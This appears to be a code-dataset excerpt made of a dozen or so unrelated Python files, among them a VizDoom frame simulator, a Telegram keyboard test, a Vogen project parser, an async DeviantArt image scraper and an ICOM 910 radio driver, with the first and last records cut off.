Writer(cfg)\n # Restore if save exists\n if Path('./simulator_saves/best').is_dir():\n self.model, self.optim, self.epoch = self.writer.restore(model=self.model, optim=self.optim, epoch=self.epoch)\n\n self.preprocessing()\n\n def preprocessing(self):\n if cfg.package_data or not Path('./data.pkl').is_file():\n vizdoom = VizDoom(cfg)\n memory = []\n for episode in trange(cfg.gather_epochs):\n vizdoom.new_episode()\n s0 = vizdoom.get_preprocessed_state()\n\n while not vizdoom.is_episode_finished():\n action = random.choice(cfg.actions)\n vizdoom.make_action(action)\n\n s1 = vizdoom.get_preprocessed_state()\n action = np.reshape(action, [1, 1, len(cfg.actions)]).astype(np.float32)\n\n memory.append([s0, action, s1])\n s0 = s1\n\n with open('data.pkl', 'wb') as f:\n pickle.dump(memory, f)\n\n # Load data\n with open(cfg.data_dir, 'rb') as f:\n s0, action, s1 = zip(*pickle.load(f))\n\n self.size = len(s0)\n self.data = tf.data.Dataset.from_tensor_slices((np.array(s0), np.array(action), np.array(s1)))\n\n def update(self, s0, action, s1):\n # Normalize\n s0_n = tf.image.per_image_standardization(s0)\n truth = tf.image.per_image_standardization(s1) - s0_n\n # Construct graph\n with tf.GradientTape() as tape:\n # Approximate next frame\n logits = self.model(s0_n, action)\n # Compare generated transformation matrix with truth\n loss = tf.reduce_mean(self.loss(truth, logits))\n\n # Log stats, images\n self.writer.log(self.optim, tape, loss)\n self.writer.log_state(\"logits\", logits)\n self.writer.log_state(\"truth_logits\", truth)\n # Compute/apply gradients\n grads = tape.gradient(loss, self.model.trainable_weights)\n grads_and_vars = zip(grads, self.model.trainable_weights)\n self.optim.apply_gradients(grads_and_vars)\n \n self.writer.global_step.assign_add(1)\n \n def train(self):\n for epoch in trange(self.epoch.numpy(), cfg.epochs):\n # Uniform shuffle\n batch = self.data.shuffle(self.size).batch(cfg.batch_size)\n for s0, action, s1 in batch:\n self.update(s0, action, s1)\n self.epoch.assign_add(1)\n self.writer.save(self.model, self.optim, self.epoch)\n\n def predict(self, s0, action):\n s0_n = tf.image.per_image_standardization(s0)\n logits = self.model(s0_n, action[None])\n return logits + s0_n\n\ndef main():\n model = Simulator()\n model.train()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"naomi-patterson/AlphaDoom","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35024877589","text":"import string, random\nimport math, typing\nimport matplotlib.pyplot as plt\nimport contextlib\nimport time\n#TODO: abstract base classes for documentation purposes later on\n#TODO: text graphing module\n#Burrows-Wheeler transform\n\ndef traverse(on=False):\n def outer(f):\n def wrapper(cls, v):\n if not on:\n return f(cls, v)\n _v = str(v) if isinstance(v, int) else v\n if not _v[1:]:\n return '{}{}'.format(cls.row[int(_v[0])][0], BlockTree.condense_rotations(str(cls.rotation)) if cls.rotation else '')\n _block = cls.row[int(_v[0])][-1]\n if _block:\n return _block[_v[1:]]\n return BlockTree(rotation = cls.rotation+1)[_v[1:]]\n\n return wrapper\n return outer\n\ndef testing_times(label = None):\n def outer(f):\n def wrapper(*args, **kwargs):\n _c = time.time()\n _result = f(*args, **kwargs)\n print(f\"{label}: action completed in method '{f.__name__}' in {time.time()-_c}\")\n return _result\n return wrapper\n return outer\n\nclass HashAlphabet:\n def __init__(self, max_depth = 6):\n self.max_depth = max_depth\n\n @testing_times(label='Random Generation')\n def __enter__(self) -> typing.List[str]:\n current = []\n for i in range(self.max_depth):\n while True:\n _row = self.__class__.random_row()\n if _row not in current:\n current.append(_row)\n break\n return current\n @staticmethod\n def random_row() -> str:\n _row = []\n for i in range(26):\n while True:\n _char = random.choice(string.ascii_lowercase)\n if _char not in _row:\n _row.append(_char)\n break\n return ''.join(_row)\n def __exit__(self, *args):\n pass\n\n @classmethod\n @testing_times(label='sigmoid curve')\n @contextlib.contextmanager\n def create_hashes(cls, in_full = False) -> typing.Generator[typing.Dict[int, str], None, None]:\n _r = [cls.scramble_alphabet(i) for i in range(1, 7)]\n if not in_full:\n yield _r\n else:\n yield [''.join(c[i] for i in range(26)) for c in _r]\n\n\n @classmethod\n def activate(cls, x, bounds=25, b=7, c=3, shift=0, reflect=False) -> int:\n if reflect:\n return -1*bounds/float(1+(b*pow(math.e, -1*c*(x-shift)))) + bounds\n return bounds/float(1+(b*pow(math.e, -1*c*(x-shift))))\n\n @classmethod\n def scramble_alphabet(cls, depth) -> typing.Dict[int, str]:\n b, c, shift = [0.1, 0.20156657963446475, 24]\n _result = {i:string.ascii_lowercase[int(cls.activate(i, b = b*depth, c = c, shift=shift))] for i in range(26)}\n missing = iter(i for i in string.ascii_lowercase if i not in _result.values())\n new_result = list(_result.items())\n return {a:b if not any(h == b and j != a for j, h in new_result[:i]) else next(missing, None) for i, (a, b) in enumerate(new_result)}\n\n @classmethod\n def increment_weights(cls, show_plot = False):\n def weights(d, current = []):\n if len(current) == 2:\n yield current\n else:\n for i in d:\n yield from weights(d, current+[i])\n\n _start = cls.scramble_alphabet()\n b_s = range(25*50)\n c_s = [random.randint(1*b, 100*(b+1))/float(random.randint(200*(i), 300*(2*i))) for b in range(1, 25) for i in range(1, 50)]\n weighted_tests = iter([i/float(10), b, c] for i in b_s for b in c_s for c in range(1, 25))\n last = []\n while abs(len(set(_start.values())) - len(list(_start.values()))) > 4:\n _w = next(weighted_tests, None)\n #print(_w)\n if not _w:\n return _start\n b, c, shift = _w\n last = [b, c, shift]\n _start = cls.scramble_alphabet(b = b, c = c, shift=shift)\n if show_plot:\n b, c, shift = last\n plt.plot(range(500), [cls.activate(i, b = b, c = c, shift = shift) for i in range(500)])\n plt.show()\n return _start, last\n\n\n\nwith HashAlphabet.create_hashes(True) as results1:\n pass\n\nwith HashAlphabet(6) as results2:\n pass\n\nclass BlockTree:\n combo_hashes = ['11111', '11110', '11101', '11100', '11011', '11010', '11001', '11000', '10111', '10110', '10101', '10100', '10011', '10010', '10001', '10000', '01111', '01110', '01101', '01100', '01011', '01010', '01001', '01000', '00111', '00110']\n def __init__(self, _start = 0, **kwargs):\n self.rotation = kwargs.get('rotation', 0)\n self.row = [[results2[kwargs.get('depth', 0)][i], BlockTree(i+1, depth = kwargs.get('depth', 0)+1, rotation=self.rotation) if i+1 < 26 and kwargs.get('depth', 0) < 5 else None] for i in range(_start, (_start+6)%26)]\n\n @traverse(on=False)\n def __getitem__(self, _val):\n return self.row[_val] if isinstance(_val, int) else dict(self.row)[_val]\n def __len__(self):\n return 1 if not any(c for _, c in self.row) else 1+max(map(len, [c for _, c in self.row]))\n\n def __bool__(self):\n return True\n\n @staticmethod\n def reverse_rotations(trailing):\n return int(''.join(i if i.isdigit() else str(string.ascii_lowercase.index(i)) for i in trailing))\n\n @staticmethod\n def combine_binary(_input):\n #print(_input)\n _start = [_input[0]]\n _full = []\n for i in _input[1:]:\n if i != _start[-1] or (len(_start)+1 > 5 and _start[-1] == '1'):\n if len(_start)+1 < 6 or _start[-1] != i:\n _full.append(_start)\n _start = [i]\n else:\n _full.append(_start)\n _full.append(['0'])\n _start = [i]\n else:\n _start.append(i)\n _full.append(_start)\n return ''.join(str(sum(map(int, i))) if i[0] == '1' else ''.join(i) for i in _full)\n\n\n def valid_lookups(self, letter, current = []):\n _start, *trailing = letter\n if current:\n #print(current)\n _to_check, *_trailing = self[BlockTree.combine_binary(''.join(current))]\n #print(_to_check)\n if not trailing:\n if current and _to_check == _start:\n yield current\n else:\n for option in BlockTree.combo_hashes:\n yield from self.valid_lookups(letter, current+[option])\n\n def lookup_path(self, letter, rotations=0):\n pass\n\n def __call__(self, hashed:str):\n _target, rotations = hashed[0], self.__class__.reverse_rotations(hashed[1:])\n\n @classmethod\n def visualize_layer(cls, block):\n return [[a, cls.visualize_layer(b) if b is not None else b] for a, b in block]\n\n @staticmethod\n def condense_rotations(_r:str):\n if len(_r) == 1:\n return _r\n _results = []\n while _r:\n if len(_r) == 1:\n return ''.join(_results+list(_r))\n a, b, *c = _r\n if int(a+b) < 26:\n _results.append(string.ascii_lowercase[int(a+b)])\n _r = c\n else:\n _results.append(a)\n _r = [b]+c\n return ''.join(_results)\n\n def __iter__(self):\n for i in self.row:\n yield i\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: {\"|\".join([a for a, _ in self.row])}'\n\n\n\n#print(BlockTree.combine_binary('1111001001111111111'))\ndef combos(d, current = []):\n if len(current) == 5:\n yield ''.join(current)\n else:\n for i in d:\n yield from combos(d, current+[i])\n\n#print({i:[i, _t[BlockTree.combine_binary(i)]] for i in combos(['1', '0'])})\n#print(list(_t.valid_lookups('f')))\n#print(HashAlphabet.scramble_alphabet(2))\n'''\nwith HashAlphabet.create_hashes(True) as results:\n for i in results:\n print('-'*20)\n print(i)\nprint('\\n\\n')\nwith HashAlphabet(6) as results:\n for i in results:\n print(i)\n print('*'*20)\n'''\n_t = BlockTree()\nprint([_t[i] for i in range(6)])\n","repo_name":"Ajax12345/huffman_coding","sub_path":"scatter_tree1.py","file_name":"scatter_tree1.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70666375555","text":"import pytest\n\nfrom app.store.telegram_api.te_view import ReplyKeyboard\n\n\n\nclass Test_ReplyKeyboard:\n bott_list = [\"дерево\", \"кустарник\", \"цветок\"]\n markup_json = {\n \"resize_keyboard\": True,\n \"selective\": False,\n \"one_time_keyboard\": True,\n \"keyboard\": [\n [\n {\n \"text\": \"дерево\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n {\n \"text\": \"кустарник\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n {\n \"text\": \"цветок\",\n \"request_contact\": False,\n \"request_location\": False,\n },\n ]\n ],\n }\n\n @pytest.mark.parametrize(\n \"bott_list, markup_json\",\n ((bott_list, markup_json),\n )\n )\n async def test_success(self, bott_list, markup_json):\n test_markup_json = await ReplyKeyboard.create(bott_list)\n assert test_markup_json == markup_json\n\n\n\nclass Test_Webhook_handling:\n request = None\n answer = None\n\n @pytest.mark.parametrize(\n \"request, answer\",\n ((request, answer),\n ))\n async def test_success(self, request, answer):\n pass\n\n","repo_name":"mobiden/telegram_bot","sub_path":"tests/telegram_api_tests/test_t_api_views.py","file_name":"test_t_api_views.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36868132778","text":"def msg(text, cor=\"\"):\n print(f\"\\033[{cor}m\"+\"=\"*(len(text)+4))\n print(text.center(len(text)+4))\n print(\"=\"*(len(text)+4)+\"\\033[m\")\n\ndef horizontal_line(len=10):\n print(\"=\"*len)\n\ndef verify_int(value, accepted):\n try:\n if int(value) in accepted:\n return int(value)\n else:\n raise TypeError\n except:\n while True:\n try:\n value = int(input(\"\\033[31mPlease insert a valid value: \\033[m\"))\n if value in accepted:\n return int(value)\n break\n except:\n pass\n\ndef verify_yes_no(resp):\n if resp.upper() in \"YN\" and resp != \"\":\n return resp.upper()\n else:\n while True:\n resp = input(\"\\033[31mPlease insert a valid response [Y/N]: \\033[m\")\n if resp.upper() in \"YN\" and resp != \"\":\n return resp.upper()\n break\n\ndef menu(title, *options):\n count = 1\n for option in options:\n print(f\"\\033[34m{count}\\033[m - \\033[33m{option}\\033[m\")\n count +=1\n print()\n resp = verify_int(input(\"Please choose an option: \"), range(1, count+1))\n return resp\n\ndef confirm_question(question):\n print(\"\\n\\033[31mAre these informations correct?\\n\\033[m\")\n print(\"\\033[34m\" + question[\"question\"] + \"\\033[34m\")\n print(\"\\033[33m\")\n print(\"A) \" + question[\"A\"])\n print(\"B) \" + question[\"B\"])\n print(\"C) \" + question[\"C\"])\n print(\"D) \" + question[\"D\"])\n print(\"E) \" + question[\"E\"])\n print(\"\\033[m\")\n\n resp = verify_yes_no(input(\"Are you sure? \"))\n return resp\n","repo_name":"Thiagomrfs/IMOQ-Manager","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28908586866","text":"import dataclasses\n\nfrom libresvip.model.base import (\n Note,\n Project,\n SingingTrack,\n SongTempo,\n TimeSignature,\n)\n\nfrom .model import (\n VogenNote,\n VogenProject,\n VogenTrack,\n)\nfrom .options import InputOptions\n\n\n@dataclasses.dataclass\nclass VogenParser:\n options: InputOptions\n\n def parse_project(self, vogen_project: VogenProject) -> Project:\n return Project(\n song_tempo_list=self.parse_tempos(vogen_project.bpm0),\n time_signature_list=self.parse_time_signatures(vogen_project.time_sig0),\n track_list=self.parse_tracks(vogen_project.utts),\n )\n\n def parse_tempos(self, bpm0: float) -> list[SongTempo]:\n return [SongTempo(position=0, bpm=bpm0)]\n\n def parse_time_signatures(self, time_sig0: str) -> list[TimeSignature]:\n numerator, _, denominator = time_sig0.partition(\"/\")\n return [TimeSignature(numerator=int(numerator), denominator=int(denominator))]\n\n def parse_tracks(self, utts: list[VogenTrack]) -> list[SingingTrack]:\n return [\n SingingTrack(\n title=utt.name,\n ai_singer_name=utt.singer_id,\n note_list=self.parse_notes(utt.notes),\n )\n for utt in utts\n ]\n\n def parse_notes(self, notes: list[VogenNote]) -> list[Note]:\n return [\n Note(\n start_pos=note.on,\n length=note.dur,\n lyric=note.lyric,\n pronunciation=note.rom,\n key_number=note.pitch,\n )\n for note in notes\n ]\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/vog/vogen_parser.py","file_name":"vogen_parser.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2070709723","text":"import os\nimport sys\nimport time\nimport asyncio\nimport aiohttp\nimport aiofiles\n\n\nAPI_URL = \"https://www.deviantart.com/_napi/da-user-profile/api/gallery/contents\"\n\n\nasync def download_img(session, title, url):\n url = \"https://backend.deviantart.com/oembed?url=\" + url\n\n async with session.get(url) as response:\n if response.ok:\n json = await response.json()\n \n async with session.get(json[\"url\"]) as response:\n if response.ok:\n async with aiofiles.open(title, mode='wb') as file:\n await file.write(await response.read())\n\n\nasync def request_next_bunch(session, params):\n tasks = []\n async with session.get(API_URL, params=params) as response:\n if response.ok:\n json = await response.json()\n \n for index, img in enumerate(json[\"results\"]):\n title, url = str(params[\"offset\"] + index) + \".jpg\", img[\"deviation\"][\"url\"]\n tasks.append(asyncio.create_task(download_img(session, title, url)))\n\n params[\"offset\"] = json[\"nextOffset\"] \n \n await asyncio.gather(*tasks)\n\n\nasync def main(account):\n params = {\n \"username\": account,\n \"offset\": 0,\n \"limit\": 20\n }\n\n async with aiohttp.ClientSession() as session:\n while params[\"offset\"] is not None:\n await request_next_bunch(session, params)\n","repo_name":"Abullity/Async-DeviantArt-Image-Scraper","sub_path":"run_async.py","file_name":"run_async.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22040914707","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^pessoa-juridica$', views.listar_clientesPJ, name='listar_clientesPJ'),\n url(r'^pessoa-juridica/novo/$', views.novo_clientePJ, name='novo_clientePJ'),\n url(r'^pessoa-juridica/editar/(?P\\d+)/$',\n views.editar_clientePJ, name='editar_clientePJ'),\n url(r'^pessoa-juridica/excluir/(?P\\d+)/$',\n views.excluir_clientePJ, name='excluir_clientePJ'),\n url(r'^pessoa-fisica$', views.listar_clientesPF, name='listar_clientesPF'),\n url(r'^pessoa-fisica/novo/$', views.novo_clientePF, name='novo_clientePF'),\n url(r'^pessoa-fisica/editar/(?P\\d+)/$',\n views.editar_clientePF, name='editar_clientePF'),\n url(r'^pessoa-fisica/excluir/(?P\\d+)/$',\n views.excluir_clientePF, name='excluir_clientePF'),\n]\n","repo_name":"luzfcb/bcrsilva","sub_path":"bcrsilva/cliente/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72520705795","text":"# me - this DAT\n# scriptOp - the OP which is cooking\n#\n# press 'Setup Parameters' in the OP to call this function to re-create the parameters.\nimport struct\n\ndef setupParameters(scriptOp):\n page = scriptOp.appendCustomPage('Custom')\n p = page.appendPulse('Change')\n return\n\n# called whenever custom pulse parameter is pushed\ndef onPulse(par):\n return\n\ndef cook(scriptOp):\n scriptOp.clear()\n scriptOp.appendRow(['pos', 'r', 'g', 'b', 'a'])\n inDat = scriptOp.inputs[0]\n\n colorCount = len(inDat.rows()) - 1\n for idx, r in enumerate(inDat.rows()):\n color = r[0].val\n if r[0].val[0] == '#':\n color = color[1:]\n cs = list(map(lambda x: x / 256, struct.unpack('BBB',bytes.fromhex(color))))\n cs.insert(0, idx / colorCount)\n cs.append(1)\n scriptOp.appendRow(cs)\n return\n","repo_name":"ulyssesdotcodes/oscillare","sub_path":"TD/scripts/Visuals/palette_mapper.py","file_name":"palette_mapper.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"19563699090","text":"#!/usr/bin/python3\n\n\"\"\"\nImplemetation of hash table in python using list and tuples.\nThe keys are accepted as integers and values the values can\nbe passed as any data type.\n\"\"\"\n\nlength = 10\n\nhash_table = [None]*10\nprint(hash_table)\n\ndata_to_be_inserted = { \n 2 : 'a', \n 3 : 'c', \n 13 : 'd', \n 10 : 'r', \n 12 : 'x', \n 7 : 'u', \n 18 : 'p', \n 0 : 'n' \n}\n\ndef hash_function(key):\n return key % 10 \n\ndef insert(key, value):\n pos = hash_function(key)\n if hash_table[pos]:\n hash_table[pos].append(( key, value ))\n else:\n hash_table[pos] = [( key, value )]\n\ndef create_table():\n cont = True \n while cont:\n key = int(input(\"type key which is an integer \"))\n value = input(\"type value \")\n insert(key, value)\n cont = bool(input(\"continue? type y/n \") == 'y')\n if not cont:\n break\n \ncreate_table()\n\nprint(hash_table)\n","repo_name":"himan2ds/data_structures_with_python","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27510109663","text":"\"\"\" \nWrite a function, token_replace, that takes in a dictionary of tokens and a string. The function \nshould return a new string where tokens are replaced.\n\nTokens are enclosed in a pair of '$'. You can assume that the input string is properly formatted. \nTokens should be replaced from left to right in the string (see test_05).\n\"\"\"\n\ndef token_replace(s, token):\n \n for word, value in token.items():\n s = s.replace(word, value)\n\n return s \n\n# Driver code\n# Test case 01\n\ntokens = {\n '$LOCATION$': 'park',\n '$ANIMAL$': 'dog',\n}\nprint(token_replace('Walk the $ANIMAL$ in the $LOCATION$!', tokens))\n# -> 'Walk the dog in the park!'\n\n# Test case 02\ntokens = {\n '$ADJECTIVE$': 'quick',\n '$VERB$': 'hopped',\n '$DIRECTION$': 'North'\n}\nprint(token_replace('the $ADJECTIVE$ fox $VERB$ $ADJECTIVE$ly $DIRECTION$ward', tokens))\n# -> 'the quick fox hopped quickly Northward'\n\n# Test case 03 \ntokens = {\n '$greeting$': 'hey programmer',\n}\nprint(token_replace('his greeting is always $greeting$.', tokens))\n# -> 'his greeting is always hey programmer.'","repo_name":"monika0603/glowing-spork","sub_path":"mixed_recall/token_replace.py","file_name":"token_replace.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4783935318","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('assocr', '0002_uf'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='uf',\n name='typequote',\n field=models.CharField(default=1, max_length=20),\n preserve_default=True,\n ),\n ]\n","repo_name":"erueloi/Assocr","sub_path":"assocr/migrations/0003_auto_20150227_1307.py","file_name":"0003_auto_20150227_1307.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33196194","text":"\"\"\" @package hwm.hardware.devices.drivers.icom_910.icom_910\nThis module contains a hardware driver and command handler for the ICOM 910 radio.\n\"\"\"\n\n# Import required modules\nimport logging, time\nimport Hamlib\nfrom twisted.internet import task, defer\nfrom twisted.internet.defer import inlineCallbacks\nfrom hwm.core.configuration import *\nfrom hwm.hardware.pipelines import pipeline\nfrom hwm.hardware.devices.drivers import driver\nfrom hwm.command import command\nfrom hwm.command.handlers import handler\n\nclass ICOM_910(driver.HardwareDriver):\n \"\"\" A driver for the ICOM 910 radio.\n\n This class provides a hardware driver for the ICOM 910 series of radios. It is primarily responsible for controlling \n the radio and automatically correcting its frequency for doppler shifts. In addition, it provides a command handler \n capable of controlling the ICOM 910.\n\n @note This driver requires that Hamlib2 be installed and configured, including the Python bindings.\n @note This driver is not currently capable of sending or receiving data to or from the radio directly. It is designed \n for pipelines that also contain a TNC, which will serve as the pipeline's input and output device.\n @note This driver is currently setup to operate in half-duplex mode. In half-duplex mode, only the MAIN VFO is set and\n the uplink frequency is specified via a split frequency.\n @note The ICOM 910 driver will work with the TNC driver to make sure that it doesn't change its frequency when the \n TNC is receiving data. This will prevent the ICOM from entering an undefined state.\n \"\"\"\n\n def __init__(self, device_configuration, command_parser):\n \"\"\" Sets up the ICOM 910h driver.\n\n @param device_configuration A dictionary containing the radios's configuration options.\n @param command_parser A reference to the active CommandParser instance. The driver will use this to\n automatically update the RX and TX frequencies as needed.\n \"\"\"\n\n super(ICOM_910,self).__init__(device_configuration, command_parser)\n\n # Set configuration settings\n self.icom_device_path = device_configuration['icom_device_path']\n self.doppler_update_frequency = device_configuration['doppler_update_frequency'] # s\n self.doppler_update_inactive_tx_delay = device_configuration['doppler_update_inactive_tx_delay'] # s\n\n # Initialize the driver's command handler\n self._command_handler = ICOM910Handler(self)\n\n self._reset_driver_state()\n\n def prepare_for_session(self, session_pipeline):\n \"\"\" Prepares the radio for use by a new session by loading the necessary services and setting up Hamlib.\n\n @note This method loads the active 'tracker' service from the session pipeline. The driver will use this service to \n load the doppler shift multiplier for the active target. If a 'tracker' service can not be loaded, no doppler\n correction will be applied.\n @note This method loads the active 'tnc_state' service from the session pipeline. The driver will use this service \n to make sure that it does not allow its uplink frequency to be changed if data is being transmitted. If this \n service can't be located, no such protection will be provided (possibly putting the radio into an undefined \n state).\n\n @param session_pipeline The Pipeline associated with the new session.\n @return Returns True once the radio is ready for use by the session.\n \"\"\"\n\n self._reset_driver_state()\n\n # Load the 'tracker' service\n self._session_pipeline = session_pipeline\n try:\n self._tracker_service = session_pipeline.load_service(\"tracker\")\n self._tracker_service.register_position_receiver(self.process_new_doppler_correction)\n except pipeline.ServiceTypeNotFound as e:\n # A tracker service isn't available\n logging.error(\"The \"+self.id+\" driver could not load a 'tracker' service from the session's pipeline.\")\n\n # Load the 'tnc_state' service\n try:\n self._tnc_state_service = session_pipeline.load_service(\"tnc_state\")\n except pipeline.ServiceTypeNotFound as e:\n # A tnc_state service isn't available\n logging.error(\"The \"+self.id+\" driver could not load a 'tnc_state' service from the session's pipeline.\")\n\n # Create a Hamlib rig for the radio\n Hamlib.rig_set_debug(Hamlib.RIG_DEBUG_NONE)\n self._command_handler.radio_rig = Hamlib.Rig(Hamlib.RIG_MODEL_IC910)\n self._command_handler.radio_rig.set_conf(\"rig_pathname\",self.icom_device_path)\n self._command_handler.radio_rig.set_conf(\"retry\",\"5\")\n self._command_handler.radio_rig.open()\n\n return True\n\n def cleanup_after_session(self):\n \"\"\" Resets the radio to its idle state after the session using it has ended.\n \"\"\"\n\n # Reset the device\n self._command_handler.radio_rig.close()\n self._command_handler.radio_rig = None\n self._reset_driver_state()\n\n return\n\n def get_state(self):\n \"\"\" Provides a dictionary that contains the current state of the radio.\n\n @return Returns a dictionary containing select elements of radio state.\n \"\"\"\n\n return self._radio_state\n\n @inlineCallbacks\n def process_new_doppler_correction(self, target_position):\n \"\"\" Notifies the radio driver that new doppler correction information is available.\n\n This inline callback receives new target position information (including the doppler correction) from a 'tracker' \n service. The driver will use this information to periodically (as defined in the configuration) update the uplink \n and downlink frequencies on the radio.\n\n @note If the active tracker service doesn't provide a doppler correction, this method will not update the radio's\n frequency.\n @note Because this method uses the set_uplink_freq command, it will only update the uplink frequency if the radio is\n not currently transmitting (as determined by the pipeline's tnc_state service). If the TNC is receiving data \n when the command is received, it will be ignored.\n\n @param target_position A dictionary containing details about the target's position, including its doppler \n correction.\n @return Returns True after updating both the uplink and download frequencies or False if an error occurs.\n \"\"\"\n\n # Verify the the target position\n if 'doppler_multiplier' not in target_position:\n logging.error(\"The target position provided to the '\"+self.id+\"' driver did not contain a doppler correction multiplier.\")\n yield defer.returnValue(False)\n\n # Make sure it's been long enough since the last update\n if (int(time.time()) - self._last_doppler_update) > self.doppler_update_frequency:\n downlink_freq_set = False\n uplink_freq_set = False\n\n # Send the command to update the downlink frequency\n new_downlink_freq = target_position['doppler_multiplier'] * self._radio_state['set_rx_freq']\n command_request = {\n 'command': \"set_rx_freq\",\n 'destination': self._session_pipeline.id+\".\"+self.id,\n 'parameters': {\n 'frequency': new_downlink_freq\n }\n }\n command_deferred = self._command_parser.parse_command(command_request, \n user_id = self._session_pipeline.current_session.user_id)\n results = yield command_deferred\n\n # Send the command to update the uplink frequency\n if results['response']['status'] is not 'error':\n downlink_freq_set = True\n new_uplink_freq = target_position['doppler_multiplier'] * self._radio_state['set_tx_freq']\n command_request = {\n 'command': \"set_tx_freq\",\n 'destination': self._session_pipeline.id+\".\"+self.id,\n 'parameters': {\n 'frequency': new_uplink_freq\n }\n }\n command_deferred = self._command_parser.parse_command(command_request, \n user_id = self._session_pipeline.current_session.user_id)\n results = yield command_deferred\n\n # Verify the results\n if results['response']['status'] is not 'error':\n uplink_freq_set = True\n\n if uplink_freq_set and downlink_freq_set:\n self._last_doppler_update = time.time()\n yield defer.returnValue(True)\n else:\n logging.error(\"The '\"+self.id+\"' driver did not update its doppler correction because one or both of the \"+\n \"'set_rx_freq' and 'set_tx_freq' commands failed.\")\n yield defer.returnValue(False)\n\n def _reset_driver_state(self):\n \"\"\" Resets the radio driver's state.\n \"\"\"\n\n # Set the driver's attributes\n self._tracker_service = None\n self._tnc_state_service = None\n self._session_pipeline = None\n self._last_doppler_update = 0\n self._radio_state = {\n \"set_tx_freq\": 0.0,\n \"set_rx_freq\": 0.0,\n \"shifted_tx_freq\": 0.0,\n \"shifted_rx_freq\": 0.0,\n \"mode\": None\n }\n\nclass ICOM910Handler(handler.DeviceCommandHandler):\n \"\"\" A command handler that handles basic commands for the ICOM 910 series of radios.\n\n @note Most of the commands in this handler require that Hamlib be installed with the Python bindings.\n \"\"\"\n\n def __init__(self, driver):\n \"\"\" Sets up the ICOM 910 command handler.\n\n @param driver The Driver instance that offers this command handler.\n \"\"\"\n\n super(ICOM910Handler,self).__init__(driver)\n\n # Set handler state\n self.radio_rig = None\n\n def command_set_mode(self, active_command):\n \"\"\" Sets the radio's mode and updates the driver's state appropriately.\n \n @note Currently, this command can only set the mode to: \"FM\"\n\n @throws Raises CommandError if the command fails for some reason.\n\n @param active_command The executing Command. Contains the command parameters.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n if self.radio_rig is not None:\n if 'mode' in active_command.parameters:\n # Set the mode in Hamlib\n new_mode = active_command.parameters['mode']\n if new_mode == \"FM\":\n response = self.radio_rig.set_mode(Hamlib.RIG_MODE_FM)\n else:\n raise command.CommandError(\"An unrecognized mode was specified.\")\n\n # Check for errors\n if response is not Hamlib.RIG_OK:\n raise command.CommandError(\"An error occured setting the radio's mode.\")\n\n # Get the mode and update the driver state\n mode, width = self.radio_rig.get_mode()\n self.driver._radio_state['mode'] = Hamlib.rig_strrmode(mode)\n\n return {'message': \"The radio mode has been set.\", 'mode': new_mode}\n else:\n raise command.CommandError(\"No mode specified for the 'set_mode' command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_mode(self):\n \"\"\" Meta-data for the \"set_mode\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"select\",\n \"required\": True,\n \"title\": \"mode\",\n \"description\": \"The Icom 910's mode.\",\n \"multiselect\": False,\n \"options\": [\n ['FM', 'FM']\n ]\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_mode', self.name, requires_active_session = True)\n\n def command_set_rx_freq(self, active_command):\n \"\"\" Sets the downlink frequency of the radio.\n\n @note This driver works in half-duplex mode with the RX frequency set on the main VFO and the TX frequency set via \n a split mode.\n\n @throws Raises CommandError if the command fails for some reason.\n \n @param active_command The executing Command. Contains the command parameters.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n if self.radio_rig is not None:\n if 'rx_freq' in active_command.parameters:\n # Set the rx frequency as the main VFO frequency\n response = self.radio_rig.set_freq(int(active_command.parameters['rx_freq']*1000000), Hamlib.RIG_VFO_MAIN)\n\n if response is not Hamlib.RIG_OK:\n raise command.CommandError(\"An error occured while setting the radio's RX frequency on the main VFO.\")\n\n # Get the main VFO frequency and update the driver state\n radio_freq = self.radio_rig.get_freq()\n if self.driver._radio_state['set_rx_freq'] == 0:\n self.driver._radio_state['set_rx_freq'] = radio_freq\n else:\n self.driver._radio_state['shifted_rx_freq'] = radio_freq\n return {'message': \"The radio's RX frequency has been set.\", 'frequency': (radio_freq/1000000)}\n 